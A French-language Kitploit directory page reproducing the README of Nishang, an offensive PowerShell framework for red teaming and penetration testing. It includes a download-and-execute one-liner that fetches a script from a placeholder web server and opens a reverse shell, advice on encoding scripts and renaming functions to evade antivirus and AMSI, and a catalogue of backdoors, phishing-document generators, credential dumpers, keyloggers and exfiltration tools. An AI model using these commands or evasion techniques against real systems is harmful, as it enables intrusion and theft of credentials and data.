Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
nishang — Nishang - PowerShell offensif pour l'équipe rouge, les tests de pénétration et la sécurité offensive. | Kitploit
Outils/GitHubGitHub/samratashok/nishang
Cassage de Mots de PasseOutils de PhishingEscalade de PrivilègesGénération de PayloadsExploitationMouvement LatéralExfiltration de DonnéesCollecte d'InformationsPost-ExploitationTests d'IntrusionCommandement et ContrôleRed Teaming
10.0k2.5kil y a 3 ansVérifié par Kitploit

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
GitHubsamratashok/nishang

nishang

Nishang - PowerShell offensif pour l'équipe rouge, les tests de pénétration et la sécurité offensive.

Voir le dépôt
Partager

Nishang

Nishang est un framework et une collection de scripts et de payloads qui permet d'utiliser PowerShell pour la sécurité offensive, les tests de pénétration et le red teaming. Nishang est utile pendant toutes les phases des tests de pénétration.

Par Nikhil Mittal Fondateur de Altered Security - Formation pratique au red team et à la sécurité d'entreprise !

Utilisation

Importer tous les scripts dans la session PowerShell actuelle (PowerShell v3 et ultérieur).

root@kitploit:~
PS C:\nishang> Import-Module .\nishang.psm1

Utiliser les scripts individuels avec le dot sourcing.

root@kitploit:~
PS C:\nishang> . C:\nishang\Gather\Get-Information.ps1

PS C:\nishang> Get-Information

Pour obtenir de l'aide sur un script ou une fonction, utilisez :

root@kitploit:~
PS C:\nishang> Get-Help [scriptname] -full

Notez que l'aide est disponible pour la fonction chargée après l'exécution du script et non pour le script lui-même depuis la version 0.3.8. Dans tous les cas, le nom de la fonction est le même que celui du script.

Par exemple, pour voir l'aide sur Get-WLAN-Keys.ps1, utilisez

root@kitploit:~
PS C:\nishang> . C:\nishang\Get-WLAN-Keys.ps1

PS C:\nishang> Get-Help Get-WLAN-Keys -Full

Anti-Virus

Les scripts Nishang sont détectés comme malveillants par de nombreux antivirus. Les scripts sur une cible sont destinés à être utilisés en mémoire, ce qui est très facile à faire avec PowerShell. Deux méthodes de base pour exécuter des scripts PowerShell en mémoire :

Méthode 1. Utiliser le téléchargement et l'exécution en mémoire : Utilisez la commande ci-dessous pour exécuter un script PowerShell à partir d'un shell distant, d'un shell natif meterpreter, d'un web shell, etc., et la fonction qu'il exporte. Tous les scripts de Nishang exportent une fonction du même nom dans la session PowerShell actuelle.

root@kitploit:~
powershell iex (New-Object Net.WebClient).DownloadString('http://<yourwebserver>/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress [IP] -Port [PortNo.]

Méthode 2. Utiliser le paramètre -encodedcommand (ou -e) de PowerShell Tous les scripts de Nishang exportent une fonction du même nom dans la session PowerShell actuelle. Assurez-vous donc que l'appel de fonction est effectué dans le script lui-même lors de l'utilisation du paramètre encodedcommand à partir d'un shell non PowerShell. Pour l'exemple ci-dessus, ajoutez un appel de fonction (sans guillemets) "Invoke-PowerShellTcp -Reverse -IPAddress [IP] -Port [PortNo.]".

Encodez le script en utilisant Invoke-Encode de Nishang :

root@kitploit:~
PS C:\nishang> . \nishang\Utility\Invoke-Encode

PS C:\nishang> Invoke-Encode -DataToEncode C:\nishang\Shells\Invoke-PowerShellTcp.ps1 -OutCommand

Données encodées écrites dans .\encoded.txt

Commande encodée écrite dans .\encodedcommand.txt

À partir de ce qui précède, utilisez le script encodé depuis encodedcommand.txt et exécutez-le sur une cible où des commandes peuvent être exécutées (un shell distant, un shell natif meterpreter, un web shell, etc.). Utilisez-le comme ci-dessous :

root@kitploit:~
C:\Users\target> powershell -e [encodedscript]

Si les scripts sont toujours détectés, changer les noms des fonctions et des paramètres et supprimer le contenu d'aide aidera.

Si l'AMSI de Windows 10 bloque toujours l'exécution du script, consultez ce blog : http://www.labofapenetrationtester.com/2016/09/amsi.html

Scripts

Nishang contient actuellement les scripts et payloads suivants.

ActiveDirectory

Set-DCShadowPermissions

Modifier les objets AD pour fournir les permissions minimales requises pour DCShadow.

Antak - the Webshell

Antak

Exécuter des scripts PowerShell en mémoire, exécuter des commandes, et télécharger et uploader des fichiers en utilisant ce webshell.

Backdoors

HTTP-Backdoor

Un backdoor pouvant recevoir des instructions de sites tiers et exécuter des scripts PowerShell en mémoire.

DNS_TXT_Pwnage

Un backdoor pouvant recevoir des commandes et des scripts PowerShell via des requêtes DNS TXT, les exécuter sur une cible, et être contrôlé à distance à l'aide de ces requêtes.

Execute-OnTime

Un backdoor pouvant exécuter des scripts PowerShell à un moment donné sur une cible.

Gupt-Backdoor

Un backdoor pouvant recevoir des commandes et des scripts depuis un SSID WLAN sans s'y connecter.

Add-ScrnSaveBackdoor

Un backdoor pouvant utiliser l'économiseur d'écran Windows pour l'exécution de commandes et de scripts à distance.

Invoke-ADSBackdoor

Un backdoor pouvant utiliser des flux de données alternatifs et le registre Windows pour assurer la persistance.

Add-RegBackdoor

Un backdoor utilisant la technique bien connue du débogueur pour exécuter un payload avec les touches rémanentes et Utilman (touche Windows + U).

Set-RemoteWMI

Modifier les permissions des espaces de noms DCOM et WMI pour autoriser l'accès à un utilisateur non administrateur.

Set-RemotePSRemoting

Modifier les permissions de PowerShell remoting pour autoriser l'accès à un utilisateur non administrateur.

Bypass

Invoke-AmsiBypass

Implémentation de méthodes publiquement connues pour contourner/éviter AMSI.

Client

Out-CHM

Créer des fichiers CHM infectés capables d'exécuter des commandes et scripts PowerShell.

Out-Word

Créer des fichiers Word et infecter des fichiers existants pour exécuter des commandes et scripts PowerShell.

Out-Excel

Créer des fichiers Excel et infecter des fichiers existants pour exécuter des commandes et scripts PowerShell.

Out-HTA

Créer un fichier HTA pouvant être déployé sur un serveur web et utilisé dans des campagnes de phishing.

Out-Java

Créer des fichiers JAR signés pouvant être utilisés avec des applets pour l'exécution de scripts et de commandes.

Out-Shortcut

Créer des fichiers de raccourci capables d'exécuter des commandes et scripts PowerShell.

Out-WebQuery

Créer des fichiers IQY pour le phishing d'identifiants et de hash SMB.

Out-JS

Créer des fichiers JS capables d'exécuter des commandes et scripts PowerShell.

Out-SCT

Créer des fichiers SCT capables d'exécuter des commandes et scripts PowerShell.

Out-SCF

Créer un fichier SCF pouvant être utilisé pour capturer les challenges de hachage NTLM.

Escalation

Enable-DuplicateToken

Lorsque des privilèges SYSTEM sont requis.

Remove-Update

Introduire des vulnérabilités en supprimant des correctifs.

Invoke-PsUACme

Contourner l'UAC.

Execution

Download-Execute-PS

Télécharger et exécuter un script PowerShell en mémoire.

Download_Execute

Télécharger un exécutable au format texte, le convertir en exécutable, et l'exécuter.

Execute-Command-MSSQL

Exécuter des commandes PowerShell, des commandes natives ou des commandes SQL sur un serveur MSSQL avec des privilèges suffisants.

Execute-DNSTXT-Code

Exécuter du shellcode en mémoire à l'aide de requêtes DNS TXT.

Out-RundllCommand

Exécuter des commandes et scripts PowerShell ou une session PowerShell inversée en utilisant rundll32.exe.

Gather

Check-VM

Vérifier la présence d'une machine virtuelle.

Copy-VSS

Copier le fichier SAM en utilisant le service Volume Shadow Copy.

Invoke-CredentialsPhish

Tromper un utilisateur pour qu'il fournisse des identifiants en texte clair.

FireBuster FireListener

Une paire de scripts pour les tests de sortie.

Get-Information

Obtenir des informations juteuses d'une cible.

Get-LSASecret

Obtenir le secret LSA d'une cible.

Get-PassHashes

Obtenir les hachages de mots de passe d'une cible.

Get-WLAN-Keys

Obtenir les clés WLAN en texte clair d'une cible.

Keylogger

Enregistrer les frappes clavier d'une cible.

Invoke-MimikatzWdigestDowngrade

Dumper les mots de passe utilisateur en clair sur Windows 8.1 et Server 2012

Get-PassHints

Obtenir les indices de mots de passe des utilisateurs Windows depuis une cible.

Show-TargetScreen

Se reconnecter et diffuser l'écran cible en utilisant MJPEG.

Invoke-Mimikatz

Charger mimikatz en mémoire. Mis à jour et avec quelques personnalisations.

Invoke-Mimikittenz

Extraire des informations juteuses de la mémoire des processus cibles (comme les navigateurs) en utilisant des regex.

Invoke-SSIDExfil

Exfiltrer des informations telles que les identifiants utilisateur, en utilisant le SSID WLAN.

Invoke-SessionGopher

Identifier les jump-boxes administrateurs et/ou les ordinateurs utilisés pour accéder aux machines Unix.

MITM

Invoke-Interceptor

Un proxy HTTPS local pour les attaques MITM.

Pivot

Create-MultipleSessions

Vérifier les identifiants sur plusieurs ordinateurs et créer des PSSessions.

Run-EXEonRemote Copier et exécuter un exécutable sur plusieurs machines.

Invoke-NetworkRelay Créer des relais réseau entre ordinateurs.

Prasadhak

Prasadhak

Vérifier les hachages des processus en cours d'exécution par rapport à la base de données VirusTotal.

Scan

Brute-Force

Forcer brutalement FTP, Active Directory, MSSQL et Sharepoint.

Port-Scan

Un scanneur de ports pratique.

Powerpreter

Powerpreter

Toutes les fonctionnalités de nishang dans un seul module de script.

Shells

Invoke-PsGcat

Envoyer des commandes et des scripts à un compte Gmail spécifié pour être exécutés par Invoke-PsGcatAgent

Invoke-PsGcatAgent

Exécuter les commandes et scripts envoyés par Invoke-PsGcat.

Invoke-PowerShellTcp

Un shell interactif PowerShell de connexion inversée ou bind

Invoke-PowerShellTcpOneLine

Version allégée de Invoke-PowerShellTcp. Contient également une version squelette qui pourrait tenir dans deux tweets.

Invoke-PowerShellTcpOneLineBind

Version bind de Invoke-PowerShellTcpOneLine.

Invoke-PowerShellUdp

Un shell interactif PowerShell de connexion inversée ou bind sur UDP

Invoke-PowerShellUdpOneLine

Version allégée de Invoke-PowerShellUdp.

Invoke-PoshRatHttps

PowerShell interactif inversé sur HTTPS.

Invoke-PoshRatHttp

PowerShell interactif inversé sur HTTP.

Remove-PoshRat

Nettoyer le système après avoir utilisé Invoke-PoshRatHttps

Invoke-PowerShellWmi

PowerShell interactif en utilisant WMI.

Invoke-PowerShellIcmp

Un shell inversé interactif PowerShell sur ICMP.

Invoke-JSRatRundll

Un shell inversé interactif PowerShell sur HTTP en utilisant rundll32.exe.

Invoke-JSRatRegsvr

Un shell inversé interactif PowerShell sur HTTP en utilisant regsvr32.exe.

Utility

Add-Exfiltration

Ajouter une capacité d'exfiltration de données vers Gmail, Pastebin, un serveur web et DNS à n'importe quel script.

Add-Persistence

Ajouter une capacité de persistance au redémarrage à un script.

Remove-Persistence

Supprimer la persistance ajoutée par le script Add-Persistence.

Do-Exfiltration

Tuyauter (|) ceci vers n'importe quel script pour exfiltrer la sortie.

Download

Transférer un fichier vers la cible.

Parse_Keys

Analyser les touches enregistrées par le keylogger.

Invoke-Encode

Encoder et compresser un script ou une chaîne.

Invoke-Decode

Décoder et décompresser un script ou une chaîne provenant de Invoke-Encode.

Start-CaptureServer

Exécuter un serveur web qui enregistre l'authentification de base et les hachages SMB.

ConvertTo-ROT13

Encoder une chaîne en ROT13 ou décoder une chaîne ROT13.

Out-DnsTxt

Générer des enregistrements DNS TXT pouvant être utilisés avec d'autres scripts.

[Base64ToString]

[StringToBase64]

[ExetoText]

[TexttoExe]

Mises à jour

Les mises à jour concernant Nishang se trouvent sur mon blog http://labofapenetrationtester.com et mon fil Twitter @nikhil_mitt.

Bugs, Retours et Demandes de fonctionnalités

Veuillez soumettre un problème si vous rencontrez un bug ou avez une demande de fonctionnalité. Vous pouvez m'envoyer un email à nikhil [dot] uitrgpv at gmail.com

Liste de diffusion

Pour les retours, discussions et demandes de fonctionnalités, rejoignez : http://groups.google.com/group/nishang-users

Contribuer

Je suis toujours à la recherche de contributeurs pour Nishang. Veuillez soumettre des demandes ou m'envoyer un email.

Articles de blog

Quelques articles de blog utiles à consulter pour les débutants :

http://www.labofapenetrationtester.com/2014/06/nishang-0-3-4.html

http://labofapenetrationtester.com/2012/08/introducing-nishang-powereshell-for.html

http://labofapenetrationtester.com/2013/08/powerpreter-and-nishang-Part-1.html

http://www.labofapenetrationtester.com/2013/09/powerpreter-and-nishang-Part-2.html

Tous les articles sur Nishang :

http://www.labofapenetrationtester.com/search/label/Nishang

Télécharger l’outil